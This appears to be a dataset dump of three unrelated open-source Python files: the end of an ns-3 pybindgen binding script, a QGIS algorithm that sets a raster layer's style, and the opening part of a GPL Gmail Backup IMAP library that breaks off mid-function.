## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3AddressChecker_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')])
return
def register_Ns3AddressValue_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressValue const &', 'arg0')])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor]
cls.add_constructor([param('ns3::Address const &', 'value')])
## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Address',
[],
is_const=True)
## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Address const &', 'value')])
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""
***************************************************************************
SetRasterStyle.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
import os
from qgis.PyQt.QtXml import QDomDocument
from qgis.core import (QgsProcessingAlgorithm,
QgsProcessingParameterRasterLayer,
QgsProcessingParameterFile,
QgsProcessingOutputRasterLayer)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class SetRasterStyle(QgisAlgorithm):
INPUT = 'INPUT'
STYLE = 'STYLE'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Raster tools')
def groupId(self):
return 'rastertools'
def __init__(self):
super().__init__()
def flags(self):
return super().flags() | QgsProcessingAlgorithm.FlagNoThreading | QgsProcessingAlgorithm.FlagDeprecated | QgsProcessingAlgorithm.FlagNotAvailableInStandaloneTool
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterRasterLayer(self.INPUT,
self.tr('Raster layer')))
self.addParameter(QgsProcessingParameterFile(self.STYLE,
self.tr('Style file'), extension='qml'))
self.addOutput(QgsProcessingOutputRasterLayer(self.INPUT, self.tr('Styled')))
def name(self):
return 'setstyleforrasterlayer'
def displayName(self):
return self.tr('Set style for raster layer')
def processAlgorithm(self, parameters, context, feedback):
layer = self.parameterAsRasterLayer(parameters, self.INPUT, context)
style = self.parameterAsFile(parameters, self.STYLE, context)
with open(style) as f:
xml = "".join(f.readlines())
d = QDomDocument()
d.setContent(xml)
layer.importNamedStyle(d)
layer.triggerRepaint()
return {self.INPUT: layer} | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python2.5
# -*- coding: utf-8 -*-
#
# Gmail Backup library
#
# Copyright © 2008, 2009, 2010 Jan Svec <honza.svec@gmail.com> and Filip Jurcicek <filip.jurcicek@gmail.com>
#
# This file is part of Gmail Backup.
#
# Gmail Backup is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# Gmail Backup is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with Gmail Backup. If not, see <http://www.gnu.org/licenses/
#
# See LICENSE file for license details
import os
import sys
import imaplib
import socket
import zipfile
import email
import email.Utils
import email.Header
import email.Iterators
import email.Header
import email.Generator
import email.Errors
import sys
if sys.version_info[:2] >= (2, 5):
import email.utils
import email.header
import email.iterators
import email.header
import email.generator
import email.errors
import time
import datetime
import re
import codecs
import socket
import traceback
import shutil
import urllib
import zipfile
import string
import unicodedata
import gettext
try:
from hashlib import md5
except ImportError:
from md5 import md5
GMB_REVISION = u'$Revision$'
GMB_DATE = u'$Date$'
GMB_REVISION = GMB_REVISION[11:-2]
GMB_DATE = GMB_DATE[7:-2].split()[0]
SPEED_AVERAGE_TIME = 21 # speed average over the last x seconds
SOCKET_TIMEOUT = 60 # timeout for socket operations
MAX_LABEL_RETRIES = 5
VERSION_URL = 'http://code.google.com/p/gmail-backup-com/source/list'
SLEEP_FOR = 20 # After network error sleep for X seconds
MAX_TRY = 5 # Maximum number of reconnects
MESSAGES_DIR = os.path.join(os.path.dirname(sys.argv[0]), 'messages')
gettext.install('gmail-backup', MESSAGES_DIR, unicode=1)
def _onlyAscii(string):
if isinstance(string, unicode):
return string.encode('ascii', 'replace')
else:
return string.decode('ascii', 'replace').encode('ascii', 'replace')
def _parseMsgId(msg):
msg_id = msg['Message-Id']
if not msg_id:
from_ = msg['From']
subj = msg['Subject']
hash = md5()
hash.update(msg.as_string())
msg_id = '%s.%s.%s' % (from_, subj, hash.hexdigest())
else:
msg_id = msg_id.lstrip('<').rstrip('>')
msg_id = _onlyAscii(msg_id)
return msg_id
def _getMailInternalId(mail):
msg = email.message_from_string(mail)
return _parseMsgId(msg)
def _getMailDate(mail):
msg = email.message_from_string(mail)
return _parseMsgDate(msg)
def _getMailIMAPDate(mail):
msg = email.message_from_string(mail)
d = imaplib.Time2Internaldate(_parseMsgDate(msg))
return d
def _convertTime(t):
t = time.mktime(time.strptime(t, '%Y%m%d'))
return imaplib.Time2Internaldate(t)
def _convertTimeToNum(t):
t = time.mktime(time.strptime(t, '%Y%m%d'))
return t
def _unicodeHeader(hdr):
try:
ret = []
for item, enc in email.Header.decode_header(hdr):
try:
if enc is not None:
ret.append(item.decode(enc))
else:
ret.append(item.decode('ascii', 'replace'))
except UnicodeDecodeError, LookupError:
ret.append(item.decode('ascii', 'replace'))
return ''.join(ret)
except:
return _('<unparseable header>')
def _getMsgInitials(msg):
'''Returns from_address and subject for parsed `email` message
'''
from_address = _unicodeHeader(msg['From'])
match = re.match(r"^.*<(.*@.*\..*)>.*$", from_address)
if match:
from_address = match.group(1)
subject = _unicodeHeader(msg['Subject'])
return from_address, subject
def _getMailInitials(mail):
msg = email.message_from_string(mail)
return _getMsgInitials(msg)
def _trimDate(d):
def trim(mi, va, ma):
if va < mi:
return mi
elif va > ma:
return ma
else:
return va
(tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, tm_wday, tm_yday, tm_isdst) = d
tm_year = trim(1970, tm_year, 9999)
tm_mon = trim(1, tm_mon, 12)
tm_mday = trim(1, tm_mday, 31)
tm_hour = trim(0, tm_hour, 23)
tm_min = trim(0, tm_min, 59)
tm_sec = trim(0, tm_sec, 59)
tm_yday = trim(1, tm_yday, 366)
if tm_isdst not in [-1, 0, 1]:
tm_isdst = -1
d = (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, tm_wday, tm_yday, tm_isdst)
try:
# We will try to construct the time
time.mktime(d)
except OverflowError:
# If overflow error occurs, we will fallback to 0
d = time.localtime(0)
return d
def _parseMsgDate(msg):
d = email.Utils.parsedate(msg['Date'])
if d is None:
d = time.localtime(0)
d = _trimDate(d)
return d
def _revertDict(d):
return dict((v, k) for (k, v) in d.iteritems())
def _shiftDates(min_date, max_date):
min_date = _trimDate(min_date)
max_date = _trimDate(max_date)
shift_ts = 24*60*60 # 1 hour
try:
min_t = time.localtime(time.mktime(min_date)-shift_ts)
except ValueError:
min_t = time.localtime(time.mktime(min_date))
try:
max_t = time.localtime(time.mktime(max_date)+shift_ts)
except ValueError:
max_t = time.localtime(time.mktime(max_date))
min_t = _trimDate(min_t)
max_t = _trimDate(max_t)
return min_t, max_t
def imap_decode(s):
def sub(m):
ss = m.groups(1)[0]
if not ss:
return '&'
else:
ss = ('+'+ss+'-').replace(',', '/')
return ss.decode('utf-7')
return re.sub('&(.*?)-', sub, s)
def imap_encode(s):
def sub(m):
ss = m.groups(1)[0]
if ss == '&':
return '&-'
else:
return ss.encode('utf-7').replace('+', '&').replace('/', ',')
return re.sub('([^\x20-\x25\x27-\x7e]+|&)', sub, s).encode('ascii', 'replace')
def imap_unescape(s):
ret = re.sub(r'\\([\\"])', r'\1', s)
return ret
def imap_escape(s):
ret = re.sub(r'([\\"])', r'\\\1', s)
return ret
def _removeDiacritics(string):
'''Removes any diacritics from `string`
'''
if not isinstance(string, unicode):
string = unicode(string)
string = unicodedata.normalize('NFKD', string)
output = ''
for c in string:
if not unicodedata.combining(c):
output += c
return output
class GBNotifier(object):
def nVersion(self):
pass
def nSpeed(self, amount, d):
pass
def nBackup(self, end, mailbox, directory):
pass
def nRestore(self, end, mailbox, directory):
pass
def nClear(self, end, mailbox):
pass
def nEmailBackup(self, from_address, subject, num, total):
pass
def nEmailBackupSkip(self, num, total, skipped, total_to_skip):
pass
def nEmailRestore(self, from_address, subject, num, total):
pass
def nEmailRestoreSkip(self, from_address, subject, num, total):
pass
def nLabelsBackup(self, end):
pass
def nLabelsRestore(self, num, total):
pass
def nError(self, msg):
pass
def nLog(self, msg):
pass
def nException(self, type, error, tb):
pass
def nExceptionFull(self, type, error, tb):
pass
def nExceptionMsg(self, msg, type, error, tb):
pass
def getSpeed(self):
pass
def getTotal(self):
pass
def getPercentage(self):
pass
def updateSpeed(self):
pass
class ConsoleNotifier(GBNotifier):
FATAL_ERRORS = [socket.error, imaplib.IMAP4.abort, imaplib.IMAP4.error, KeyboardInterrupt]
def __init__(self, *args, **kwargs):
super(ConsoleNotifier, self).__init__(*args, **kwargs)
self._resetCounters()
def _resetCounters(self):
self._speed = []
self._total = 0
self._percentage = None
def uprint(self, msg):
try:
print msg
except UnicodeEncodeError:
print msg.encode('ascii', 'replace')
sys.stdout.flush()
def uprint2(self, msg):
if not sys.stdout.isatty():
return
try:
print '\r%s \r' % (msg, ),
except UnicodeEncodeError:
print '\r%s \r' % (msg.encode('ascii', 'replace'), ),
sys.stdout.flush()
def nVersion(self):
self.nLog(_("GMail Backup revision %s (%s)") % (GMB_REVISION, GMB_DATE))
def nSpeed(self, amount, d):
self._total += amount
self._speed.insert(0, (amount, d))
d_sum = 0
for idx, (a, d) in enumerate(self._speed):
d_sum += d
if d_sum > SPEED_AVERAGE_TIME:
break
del self._speed[idx+1:]
self.updateSpeed()
def getSpeed(self):
a_sum = 0
d_sum = 0
for a, d in self._speed:
d_sum += d
a_sum += a
if d_sum == 0:
return 0
else:
return (a_sum/d_sum)/1024.
def getTotal(self):
return self._total/1024./1024.
def getPercentage(self):
return self._percentage
def updateSpeed(self):
self.uprint2(_("%1.fKB/s (total: %.2fMB)") % (self.getSpeed(), self.getTotal()))
def nBackup(self, end, mailbox, directory):
if not end:
self._resetCounters()
if not end:
self.uprint(_("Starting backup of account %s into %s") % (mailbox, directory))
else:
self.uprint(_("Ending backup of account %s") % (mailbox, ))
def nRestore(self, end, mailbox, directory):
if not end:
self._resetCounters()
if not end:
self.uprint(_("Restoring the content of account %s from %s") % (mailbox, directory))
else:
self.uprint(_("End of restoring of account %s") % (mailbox, ))
def nClear(self, end, mailbox):
if not end:
self.uprint(_("Clearing the content of account %s") % (mailbox, ))
else:
self.uprint(_("End of clearing of account %s") % (mailbox, ))
def nEmailBackup(self, from_address, subject, num, total):
self._percentage = float(num)/total*100
self.uprint(_("Stored %4.1f%% (%d of %d): %s - %s") % (self._percentage, num, total, from_address, subject))
def nEmailBackupSkip(self, num, total, skipped, total_to_skip):
self._percentage = float(num)/total*100
self.uprint(_("Skip %4.1f%% (%d of %d): message already stored") % (self._percentage, num, total))
def nEmailRestore(self, from_address, subject, num, total):
self._percentage = float(num)/total*100
self.uprint(_("Restored %4.1f%%: %s - %s") % (self._percentage, from_address, subject))
def nEmailRestoreSkip(self, from_address, subject, num, total):
self._percentage = float(num)/total*100
self.uprint(_("Skipdate %4.1f%%: %s - %s") % (self._percentage, from_address, subject))
def nLabelsBackup(self, end):
if not end:
self.uprint(_("Starting backup of labels"))
else:
self.uprint(_("Backup of labels ended"))
def nLabelsRestore(self, num, total):
self.uprint(_("Restoring labels, %.1f%%") % (float(num)/total*100, ))
def nError(self, msg):
self.uprint(_('Error: %s') % msg)
def nLog(self, msg):
self.uprint(unicode(msg))
def nException(self, type, error, tb):
if isinstance(error, socket.error):
#num, message = error
self.nError(_('%s\nThere are network problems, please, try it later') % (error, ))
elif isinstance(error, imaplib.IMAP4.abort):
self.nError(_("IMAP aborted the transfer"))
elif isinstance(error, imaplib.IMAP4.error):
self.nError(_("IMAP: %s") % error.message)
elif isinstance(error, KeyboardInterrupt):
self.nLog(_("Program interrupted by user"))
else:
self.nExceptionFull(type, error, tb)
def nExceptionFull(self, type, error, tb):
t = ''.join(traceback.format_exception(type, error, tb))
self.nError(_("Error occured, full traceback is bellow (gmb.py revision %s)\n%s") % (GMB_REVISION, t))
def nExceptionMsg(self, msg, type, error, tb):
t = ''.join(traceback.format_exception(type, error, tb))
self.nError(_("%s\nIgnoring this error message.\nIf you want, please report the following traceback to gmail-backup-com-users@googlegroups.com \nThanks! (gmb.py revision %s):\n%s") % (msg, GMB_REVISION, t))
def handleError(self, msg):
e_type, e_value, e_tb = sys.exc_info()
for e in self.FATAL_ERRORS:
if isinstance(e_value, e):
raise
self.nExceptionMsg(msg, e_type, e_value, e_tb)
class MyIMAP4_SSL(imaplib.IMAP4_SSL):
'''Hack for bad implementation of sock._recv() under windows'''
def open(self, *args, **kwargs):
imaplib.IMAP4_SSL.open(self, *args, **kwargs)
self.sock.settimeout(SOCKET_TIMEOUT)
self._t1 = time.time()
def setNotifier(self, notifier):
self.notifier = notifier
def _nSpeed(self, t1, t2, amount):
if hasattr(self, 'notifier'):
d = t2 - t1
self.notifier.nSpeed(amount, d)
def read(self, size):
step = 1024 * 32
ret = []
while size > 0:
part = imaplib.IMAP4_SSL.read(self, min(size, step))
t2 = time.time()
ret.append(part)
self._nSpeed(self._t1, t2, len(part))
self._t1 = t2
size -= step
return ''.join(ret)
def send(self, data):
step = 1024 * 32
idx = 0
while idx < len(data):
part = data[idx:idx+step]
imaplib.IMAP4_SSL.send(self, part)
t2 = time.time()
self._nSpeed(self._t1, t2, len(part))
self._t1 = t2
idx += step
class GMailConnection(object):
ALL_MAILS = None
TRASH = None
OK = 'OK'
MAILBOX_NAMES = {
'en_us': ('[Gmail]/All Mail', '[Gmail]/Trash'),
'en_uk': ('[Gmail]/All Mail', '[Gmail]/Bin'),
'cs': ('[Gmail]/V&AWE-echny zpr&AOE-vy', '[Gmail]/Ko&AWE-'),
'es': ('[Gmail]/Todos', '[Gmail]/Papelera'),
'de': ('[Gmail]/Alle Nachrichten', '[Gmail]/Papierkorb'),
'fr': ('[Gmail]/Tous les messages', '[Gmail]/Corbeille'),
'ar': ('[Gmail]/&BkMGRA- &BicGRAYoBjEGSgYv-', '[Gmail]/&BkUGRwZABkUGRAYnBio-'),
'it': ('[Gmail]/Tutti i messaggi', '[Gmail]/Cestino'),
'pl': ('[Gmail]/Wszystkie', '[Gmail]/Kosz'),
'sk': ('[Gmail]/V&AWE-etky spr&AOE-vy', '[Gmail]/K&APQBYQ-'),
'bahasa_indonesia': ('[Gmail]/Semua Email', '[Gmail]/Tong Sampah'),
'bahasa_melayu': ('[Gmail]/Semua Mel', '[Gmail]/Sampah'),
'catala': ('[Gmail]/Tots els missatges', '[Gmail]/Paperera'),
'dansk': ('[Gmail]/Alle e-mails', '[Gmail]/Papirkurv'),
'eesti_keel': ('[Gmail]/K&APU-ik kirjad', '[Gmail]/Pr&APw-gikast'),
'filipino': ('[Gmail]/Lahat ng Mail', '[Gmail]/Basurahan'),
'hrvatski': ('[Gmail]/Sva po&AWE-ta', '[Gmail]/Otpad'),
'islenska': ('[Gmail]/Allur p&APM-stur', '[Gmail]/Rusl'),
'latviesu': ('[Gmail]/Visas v&ARM-stules', '[Gmail]/Miskaste'),
'lietuviu': ('[Gmail]/Visi lai&AWE-kai', '[Gmail]/&AWA-iuk&AWE-liad&ARcBfgEX-'),
'magyar': ('[Gmail]/&ANY-sszes lev&AOk-l', '[Gmail]/Kuka'),
'norsk': ('[Gmail]/All e-post', '[Gmail]/Papirkurv'),
'nederlands': ('[Gmail]/Alle berichten', '[Gmail]/Prullenbak'),
'portugues_brazil': ('[Gmail]/Todos os e-mails', '[Gmail]/Lixeira'),
'portugues_portugal': ('[Gmail]/Todo o correio', '[Gmail]/Lixo'),
'romana': ('[Gmail]/Toate mesajele', '[Gmail]/Co&AV8- de gunoi'),
'slovenscina': ('[Gmail]/Vsa po&AWE-ta', '[Gmail]/Smetnjak'),
'suomi': ('[Gmail]/Kaikki viestit', '[Gmail]/Roskakori'),
'svenska': ('[Gmail]/Alla mail', '[Gmail]/Papperskorgen'),
'tieng_viet': ('[Gmail]/T&AOIDAQ-t ca&Awk- Th&AbA-', '[Gmail]/Thu&AwA-ng Ra&AwE-c'),
'turkce': ('[Gmail]/T&APw-m Postalar', '[Gmail]/&AMcA9g-p Kutusu'),
'ellnvika': ('[Gmail]/&A4wDuwOx- &A8QDsQ- &A7wDtwO9A80DvAOxA8QDsQ-', '[Gmail]/&A5oDrAO0A78Dwg- &A7EDwAO,A8EDwQO5A7wDvAOsA8QDyQO9-'),
'azbuka1': ('[Gmail]/&BBIEQQRP- &BD8EPgRHBEIEMA-', '[Gmail]/&BBoEPgRABDcEOAQ9BDA-'),
'azbuka2': ('[Gmail]/&BCEEMgQw- &BD8EPgRIBEIEMA-', '[Gmail]/&BB4EQgQ,BDAENA-'),
'azbuka3': ('[Gmail]/&BCMEQQRP- &BD8EPgRIBEIEMA-', '[Gmail]/&BBoEPgRIBDgEOg-'),
'azbuka4': ('[Gmail]/&BCYETwQ7BDAEQgQw- &BD8EPgRJBDA-', '[Gmail]/&BBoEPgRIBEcENQ-'),
'hebrew': ('[Gmail]/&BdsF3A- &BdQF0wXVBdAF6A-', '[Gmail]/&BdAF6QXkBdQ-'),
'arabic': ('[Gmail]/&BkMGRA- &BicGRAYoBjEGSgYv-', '[Gmail]/&BkUGRwZABkUGRAYnBio-'),
'caj1': ('[Gmail]/&CTgJLQlA- &CS4JRwky-', '[Gmail]/&CR8JTQkwCUgJNg- &CRUJMAlHCQI-'),
'caj2': ('[Gmail]/&DggOFA4rDiEOMg4iDhcOMQ5JDgcOKw4hDhQ-', '[Gmail]/&DhYOMQ4HDgIOIg4w-'),
'caj3': ('[Gmail]/&UWiQ6JD1TvY-', '[Gmail]/&V4NXPmh2-'),
'caj4': ('[Gmail]/&YkBnCZCuTvY-', '[Gmail]/&XfJSIJZkkK5O9g-'),
'caj5': ('[Gmail]/&MFkweTBmMG4w4TD8MOs-', '[Gmail]/&MLQw33ux-'),
'caj6': ('[Gmail]/&yATMtLz0rQDVaA-', '[Gmail]/&1zTJwNG1-'),
# The same with Google Mail instead of Gmail
'en_us_GM': ('[Google Mail]/All Mail', '[Google Mail]/Trash'),
'en_uk_GM': ('[Google Mail]/All Mail', '[Google Mail]/Bin'),
'cs_GM': ('[Google Mail]/V&AWE-echny zpr&AOE-vy', '[Google Mail]/Ko&AWE-'),
'es_GM': ('[Google Mail]/Todos', '[Google Mail]/Papelera'),
'de_GM': ('[Google Mail]/Alle Nachrichten', '[Google Mail]/Papierkorb'),
'fr_GM': ('[Google Mail]/Tous les messages', '[Google Mail]/Corbeille'),
'ar_GM': ('[Google Mail]/&BkMGRA- &BicGRAYoBjEGSgYv-', '[Google Mail]/&BkUGRwZABkUGRAYnBio-'),
'it_GM': ('[Google Mail]/Tutti i messaggi', '[Google Mail]/Cestino'),
'pl_GM': ('[Google Mail]/Wszystkie', '[Google Mail]/Kosz'),
'sk_GM': ('[Google Mail]/V&AWE-etky spr&AOE-vy', '[Google Mail]/K&APQBYQ-'),
'bahasa_indonesia_GM': ('[Google Mail]/Semua Email', '[Google Mail]/Tong Sampah'),
'bahasa_melayu_GM': ('[Google Mail]/Semua Mel', '[Google Mail]/Sampah'),
'catala_GM': ('[Google Mail]/Tots els missatges', '[Google Mail]/Paperera'),
'dansk_GM': ('[Google Mail]/Alle e-mails', '[Google Mail]/Papirkurv'),
'eesti_keel_GM': ('[Google Mail]/K&APU-ik kirjad', '[Google Mail]/Pr&APw-gikast'),
'filipino_GM': ('[Google Mail]/Lahat ng Mail', '[Google Mail]/Basurahan'),
'hrvatski_GM': ('[Google Mail]/Sva po&AWE-ta', '[Google Mail]/Otpad'),
'islenska_GM': ('[Google Mail]/Allur p&APM-stur', '[Google Mail]/Rusl'),
'latviesu_GM': ('[Google Mail]/Visas v&ARM-stules', '[Google Mail]/Miskaste'),
'lietuviu_GM': ('[Google Mail]/Visi lai&AWE-kai', '[Google Mail]/&AWA-iuk&AWE-liad&ARcBfgEX-'),
'magyar_GM': ('[Google Mail]/&ANY-sszes lev&AOk-l', '[Google Mail]/Kuka'),
'norsk_GM': ('[Google Mail]/All e-post', '[Google Mail]/Papirkurv'),
'nederlands_GM': ('[Google Mail]/Alle berichten', '[Google Mail]/Prullenbak'),
'portugues_brazil_GM': ('[Google Mail]/Todos os e-mails', '[Google Mail]/Lixeira'),
'portugues_portugal_GM': ('[Google Mail]/Todo o correio', '[Google Mail]/Lixo'),
'romana_GM': ('[Google Mail]/Toate mesajele', '[Google Mail]/Co&AV8- de gunoi'),
'slovenscina_GM': ('[Google Mail]/Vsa po&AWE-ta', '[Google Mail]/Smetnjak'),
'suomi_GM': ('[Google Mail]/Kaikki viestit', '[Google Mail]/Roskakori'),
'svenska_GM': ('[Google Mail]/Alla mail', '[Google Mail]/Papperskorgen'),
'tieng_viet_GM': ('[Google Mail]/T&AOIDAQ-t ca&Awk- Th&AbA-', '[Google Mail]/Thu&AwA-ng Ra&AwE-c'),
'turkce_GM': ('[Google Mail]/T&APw-m Postalar', '[Google Mail]/&AMcA9g-p Kutusu'),
'ellnvika_GM': ('[Google Mail]/&A4wDuwOx- &A8QDsQ- &A7wDtwO9A80DvAOxA8QDsQ-', '[Google Mail]/&A5oDrAO0A78Dwg- &A7EDwAO,A8EDwQO5A7wDvAOsA8QDyQO9-'),
'azbuka1_GM': ('[Google Mail]/&BBIEQQRP- &BD8EPgRHBEIEMA-', '[Google Mail]/&BBoEPgRABDcEOAQ9BDA-'),
'azbuka2_GM': ('[Google Mail]/&BCEEMgQw- &BD8EPgRIBEIEMA-', '[Google Mail]/&BB4EQgQ,BDAENA-'),
'azbuka3_GM': ('[Google Mail]/&BCMEQQRP- &BD8EPgRIBEIEMA-', '[Google Mail]/&BBoEPgRIBDgEOg-'),
'azbuka4_GM': ('[Google Mail]/&BCYETwQ7BDAEQgQw- &BD8EPgRJBDA-', '[Google Mail]/&BBoEPgRIBEcENQ-'),
'hebrew_GM': ('[Google Mail]/&BdsF3A- &BdQF0wXVBdAF6A-', '[Google Mail]/&BdAF6QXkBdQ-'),
'arabic_GM': ('[Google Mail]/&BkMGRA- &BicGRAYoBjEGSgYv-', '[Google Mail]/&BkUGRwZABkUGRAYnBio-'),
'caj1_GM': ('[Google Mail]/&CTgJLQlA- &CS4JRwky-', '[Google Mail]/&CR8JTQkwCUgJNg- &CRUJMAlHCQI-'),
'caj2_GM': ('[Google Mail]/&DggOFA4rDiEOMg4iDhcOMQ5JDgcOKw4hDhQ-', '[Google Mail]/&DhYOMQ4HDgIOIg4w-'),
'caj3_GM': ('[Google Mail]/&UWiQ6JD1TvY-', '[Google Mail]/&V4NXPmh2-'),
'caj4_GM': ('[Google Mail]/&YkBnCZCuTvY-', '[Google Mail]/&XfJSIJZkkK5O9g-'),
'caj5_GM': ('[Google Mail]/&MFkweTBmMG4w4TD8MOs-', '[Google Mail]/&MLQw33ux-'),
'caj6_GM': ('[Google Mail]/&yATMtLz0rQDVaA-', '[Google Mail]/&1zTJwNG1-'),
}
def __init__(self, username, password, notifier, lang=None):
self.username = username
self.password = password
self.notifier = notifier
self.lang = None
if lang is not None:
self.setLanguage(lang)
self._lastMailbox = None
self._lastSearch = None
self._lastFetched = None
self._lastFetchedMsg = None
self._wasLogged = False
def recoverableError(self, e):
if isinstance(e, (socket.error, imaplib.IMAP4_SSL.abort, socket.timeout)):
return True
elif isinstance(e, imaplib.IMAP4_SSL.error):
str_e = str(e)
if self._wasLogged and 'Invalid credentials' in str_e:
return True
return False
def guessLanguage(self):
present = set()
status, ret = self.con.list()
for i in ret:
match = re.match(r'^\(.*\)\s".*"\s"(\[.*\].*)"\s*$', i)
if not match:
continue
box = match.group(1)
present.add(box)
for key, (all_mail, trash) in self.MAILBOX_NAMES.iteritems():
if all_mail in present and trash in present:
return key
for key, (all_mail, trash) in self.MAILBOX_NAMES.iteritems():
if all_mail in present:
self.notifier.nLog("Guessing language with internal code '%s', in case of problems contact us at honza.svec@gmail.com" % key)
return key
self.notifier.nError(\
'''Your Gmail account doesn't export some IMAP needed to Gmail Backup work.
Possible causes are:
- You are using the Gmail Labs.
Please go to the Settings/Label page and enable the IMAP access into
All Mails and Trash folders.
- You are using unsupported language of Gmail. Please run the following
command:
gmail-backup.exe list <your_address@gmail.com> <your_password>
and send the output of this command to our user support group:
gmail-backup-com-users@googlegroups.com
Thank you''')
raise ValueError("Cannot access IMAP folders")
def setLanguage(self, lang):
self.lang = lang
self.ALL_MAILS = self.MAILBOX_NAMES[lang][0]
self.TRASH = self.MAILBOX_NAMES[lang][1]
def connect(self, noguess=False):
self.con = MyIMAP4_SSL('imap.gmail.com', 993)
self.con.setNotifier(self.notifier)
self.con.login(self.username, self.password)
self._wasLogged = True
if self.lang is None and not noguess:
lang = self.guessLanguage()
self.setLanguage(lang)
def close(self):
self.con.shutdown()
del self.con
def select(self, mailbox):
self._lastMailbox = mailbox
self._call(self.con.select, mailbox)
def reconnect(self):
TRY = 1
sleep = SLEEP_FOR
while TRY <= MAX_TRY:
self.notifier.nLog(_("Trying to reconnect (%d)") % TRY)
try:
self.connect()
if self._lastMailbox:
self.select(self._lastMailbox)
if self._lastSearch:
self.search(self._lastSearch)
self.notifier.nLog(_("Reconnected!"))
return True
except:
e = sys.exc_info()[1]
if self.recoverableError(e):
self.notifier.nLog(_("Not connected, sleeping for %d seconds") % SLEEP_FOR)
time.sleep(sleep)
sleep *= 2
TRY += 1
else:
raise e
self.notifier.nLog(_("Unable to reconnect"))
return False
def fetchMessageId(self, num):
typ, data = self._call(self.con.fetch, num, '(BODY.PEEK[HEADER.FIELDS (Message-ID)])')
if data is None or data[0] is None:
match = None
else:
match = re.match(r'^.*:\s*<(.*)>$', data[0][1].strip())
if match:
# The message has Message-ID stored in it
imsg_id = match.group(1)
imsg_id = _onlyAscii(imsg_id)
return imsg_id
else:
# We compute our synthetic Message-ID from the whole message
mail = self.fetchMessage(num)
msg = email.message_from_string(mail)
imsg_id = _parseMsgId(msg)
return imsg_id
def fetchMessage(self, num):
if self._lastFetched == num:
return self._lastFetchedMsg
else:
typ, data = self._call(self.con.fetch, num, '(BODY.PEEK[])')
mail = data[0][1]
self._lastFetched = num
self._lastFetchedMsg = mail
return mail
def search(self, where):
self._lastSearch = where
